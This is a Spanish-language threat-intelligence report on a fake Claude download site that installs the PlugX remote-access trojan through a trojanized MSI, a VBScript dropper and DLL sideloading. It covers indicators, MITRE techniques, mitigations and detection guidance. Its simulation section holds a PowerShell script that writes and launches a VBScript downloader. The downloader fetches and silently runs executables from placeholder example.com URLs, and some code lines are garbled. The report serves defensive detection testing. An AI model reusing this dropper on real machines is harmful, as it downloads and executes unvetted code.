El sitio falso de Claude instala malware que da a los atacantes acceso a tu computadora

SOC Prime Team

Seguir

El sitio falso de Claude instala malware que da a los atacantes acceso a tu computadora

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

Los atacantes configuraron una página de descarga falsa de Claude que entregó un archivo ZIP troyanizado a usuarios desprevenidos. Una vez abierto, el archivo instaló un cliente de escritorio Claude aparentemente legítimo mientras desplegaba encubiertamente el troyano de acceso remoto PlugX a través de la carga lateral de DLL con un actualizador firmado de G DATA. La carga maliciosa se colocó en la carpeta de Inicio del usuario para mantener la persistencia y luego inició la comunicación HTTPS saliente con un servidor de mando y control. La campaña muestra cómo los actores de amenazas están explotando cada vez más el interés en herramientas de IA populares como señuelo de ingeniería social para un compromiso inicial.

Investigación

Durante el análisis, los investigadores descomprimieron el archivo ZIP, identificaron la ruta de instalación del MSI y siguieron la ejecución hasta un dropper de VBScript que escribió NOVUpdate.exe, un avk.dllmalicioso, y un archivo de datos encriptados en la carpeta de Inicio. La ejecución en sandbox confirmó que el binario cargado lateralmente se lanzó con éxito, alteró una clave de registro relacionada con TCP/IP, e inició conexiones salientes a través del puerto 443 a una dirección IP alojada en Alibaba Cloud. Estos hallazgos confirmaron la entrega de PlugX a través de una cadena de infección por etapas disfrazada de software legítimo de IA.

Mitigación

Los usuarios deben descargar el software de Claude solo de fuentes oficiales verificadas y validar la autenticidad de los paquetes de instalación antes de la ejecución. Los defensores deben inspeccionar las carpetas de Inicio en busca de binarios o DLLs inesperados, especialmente archivos que imiten componentes de actualización legítimos. También se debe revisar la telemetría del firewall y del endpoint en busca de tráfico HTTPS saliente sospechoso relacionado con aplicaciones recién instaladas. Eliminar los archivos maliciosos, revertir cualquier cambio no autorizado en el registro y ejecutar un escaneo anti-malware confiable son pasos clave para contener la amenaza.

Respuesta

Los equipos de seguridad deben detectar y alertar sobre la presencia de NOVUpdate.exe, avk.dll, o NOVUpdate.exe.dat dentro del directorio de Inicio. Las detecciones adicionales deben centrarse en binarios de actualizadores de G DATA firmados que carguen DLLs no confiables y establezcan sesiones TLS salientes inesperadas hacia la infraestructura identificada. Los hosts afectados deben someterse a una completa remediación y revisión forense para confirmar que no queden otros componentes de PlugX, mecanismos de persistencia, o cargas útiles posteriores activas.

graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[«Archivo – Sitio falso de Claude Aloja ZIP malicioso»]:::file node_malicious_zip[«Archivo – ZIP malicioso Contiene instalador MSI troyanizado»]:::file node_msi_installer[«Archivo – Instalador MSI troyanizado»]:::file node_vbscript[«Script – Claude AI.vbs Copia archivos, lanza Claude, establece persistencia»]:::script node_novupdate_exe[«Archivo – NOVUpdate.exe Actualizador legítimo de G DATA usado para DLL sideloading»]:::file node_avk_dll[«Archivo – avk.dll DLL maliciosa cargada por el actualizador»]:::file node_dat_file[«Archivo – NOVUpdate.exe.dat Payload cifrado»]:::file node_startup_folder[«Archivo – Carpeta Startup Destino de archivos copiados»]:::file node_shortcut[«Archivo – Claude AI.lnk Acceso directo que ejecuta el VBScript»]:::file node_cleanup_batch[«Archivo – cleanup.bat Elimina artefactos maliciosos»]:::file node_registry_key[«Registro – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters»]:::registry %% Nodes u2013 Techniques node_initial_access[«Técnica – T1204.002 Ejecución del usuario La víctima descarga ZIP y ejecuta MSI»]:::technique node_execution[«Técnica – T1059.005 Visual Basic Ejecuta VBScript malicioso»]:::technique node_persistence_startup[«Técnica – T1037.005 Inicio automático Copia archivos a Startup»]:::persistence node_persistence_shortcut[«Técnica – T1547.009 Modificación de acceso directo Crea y reemplaza acceso directo»]:::persistence node_appcert_dll[«Técnica – T1546.009 AppCert DLL DLL sideloading mediante G DATA»]:::evasion node_obfuscation[«Técnica – T1027.009 Archivos ofuscados Payload .dat descifrado en ejecución»]:::evasion node_registry_mod[«Técnica – T1012 Consulta de registro Modifica parámetros TCP/IP»]:::registry node_c2_proxy[«Técnica – T1090.002 Proxy externo HTTPS vía proxy»]:::c2 node_c2_web[«Técnica – T1102 Servicio web Comunicación HTTPS»]:::c2 node_indicator_removal[«Técnica – T1070.010 Eliminación de rastros Batch elimina scripts»]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion

Flujo de Ataque

Narrativa del Ataque y Comandos:
Un atacante elabora un script VBS malicioso que descarga la carga útil NOVUpdate.exe desde un servidor de mando y control (C2), lo escribe en %TEMP%, y luego lo lanza a través de wscript.exe. El mismo script también carga avk.dll desde la misma ubicación para lograr la carga lateral de DLL. El atacante se apoya en el Windows Script Host (WSH) incorporado para evitar levantar sospechas de las heurísticas tradicionales de AV.
1. Escribe el archivo VBS malicioso (malicious.vbs) a %TEMP%.
2. Invocar wscript.exe con la ruta al archivo VBS.
3. El script VBS realiza un GET HTTP para obtener NOVUpdate.exe and avk.dll, los escribe en el disco y ejecuta NOVUpdate.exe.

Script de Prueba de Regresión:

# --------------------------------------------------------------------
# Simulación de dropper malicioso – activa la regla Sigma
# --------------------------------------------------------------------
$tempDir = "$env:TEMPDropperDemo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Crear un VBS malicioso que descargue dos archivos y ejecute NOVUpdate.exe
$vbsPath = "$tempDirmalicious.vbs"
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.open "GET", "http://example.com/NOVUpdate.exe", False
objXML.send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
objStream.Close
End If

‘ Descargar avk.dll (usado para carga lateral de DLL) objXML.open «GET», «http://example.com/avk.dll«, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(«ADODB.Stream») objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile «$tempDiravk.dll», 2 objStream.Close End If

‘ Ejecutar el EXE descargado CreateObject(«WScript.Shell»).Run «»»$tempDirNOVUpdate.exe»»», 0, False «@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Ejecutar el script vía wscript.exe (esta es la telemetría que estamos probando)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPCIONAL: pausa para permitir que se dispare la detección
Start-Sleep -Seconds 10
# --------------------------------------------------------------------

Comandos de Limpieza:

# Eliminar todos los artefactos creados por la simulación
$tempDir = "$env:TEMPDropperDemo"
if (Test-Path $tempDir) {
    Remove-Item -Path $tempDir -Recurse -Force
}

# Asegúrate de que cualquier proceso NOVUpdate.exe restante sea terminado
Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis